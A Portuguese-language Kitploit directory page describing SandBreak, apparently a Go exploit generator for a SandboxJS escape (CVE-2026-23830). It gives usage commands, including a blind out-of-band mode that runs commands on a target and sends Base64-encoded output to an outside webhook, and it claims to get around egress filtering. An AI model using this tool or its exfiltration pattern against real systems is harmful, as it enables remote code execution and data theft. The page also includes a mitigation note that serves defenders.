Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23830-SandBreak — Gera e entrega payloads de exploração para CVE-2026-23830, uma fuga do SandboxJS, com modos para exfiltração OOB cega e PoC local de calculadora. Suporta listeners HTTP/HTTPS e produz payloads JavaScript minificados. | Kitploit
Ferramentas/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

Gera e entrega payloads de exploração para CVE-2026-23830, uma fuga do SandboxJS, com modos para exfiltração OOB cega e PoC local de calculadora. Suporta listeners HTTP/HTTPS e produz payloads JavaScript minificados.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
114há 7 mesesAinda não revisado
Compartilhar

SandBreak

Gerador de Exploit CVE-2026-23830 e Ferramenta Auto-Pwn

Go Version License Type

SandBreak é uma ferramenta robusta de geração de exploits baseada em Go, projetada para explorar a vulnerabilidade de Escape do SandboxJS (CVE-2026-23830).

Esta ferramenta explora o construtor AsyncFunction não protegido em versões antigas do sandboxjs, permitindo que atacantes escapem do ambiente sandbox V8 e executem código arbitrário no sistema host. Ela suporta múltiplos modos de payload, incluindo Exfiltração OOB Cega, Defacement e RCE Baseado em Erro.


Recursos

  • 2 Modos de Ataque:
    • oob: Exfiltração de Dados Out-of-Band (HTTP/HTTPS) para cenários cegos.
    • calc: Abre calc.exe (PoC Clássico).
  • OOB Inteligente: Detecta automaticamente HTTP vs HTTPS para evitar travamentos do servidor.
  • Baseado em Go: Binário único, sem dependências necessárias na máquina do atacante.
  • Leve: Gera payloads JavaScript puros e minificados.

Instalação

Clone o repositório e execute:

git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
cd CVE-2026-23830-SandBreak
go run CVE-2026-23830.go

Uso

go run CVE-2026-23830.go -mode [MODE] -cmd [COMMAND] [OPTIONS]

1. Modo OOB (RCE Cego - Profissional)

Use este modo quando não houver feedback de saída. Ele executa o comando e envia o resultado codificado em Base64 para o seu listener (ex.: webhook.site).

go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"

Contorna com sucesso travamentos básicos de filtragem de egresso ao lidar com erros de rede.

2. Modo Calc (Teste Local)

Abre uma calculadora no servidor Windows.

go run CVE-2026-23830.go -mode calc

Prova de Conceito (PoC)

Cenário: Exfiltração OOB

Atacante recebendo os dados do usuário do servidor via Webhook, apesar de não haver saída visual no site.


Aviso Legal

Esta ferramenta foi criada apenas para Fins Educacionais e Testes de Penetração Autorizados.

  • Não use esta ferramenta em sistemas que você não possui ou para os quais não tem permissão explícita para testar.
  • O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

Mitigação

Atualize o sandboxjs para a versão mais recente, onde o construtor AsyncFunction é devidamente isolado no sandbox.

npm update sandboxjs

Autor: Meysam Bal-afkan

Licença: MIT

Baixar ferramenta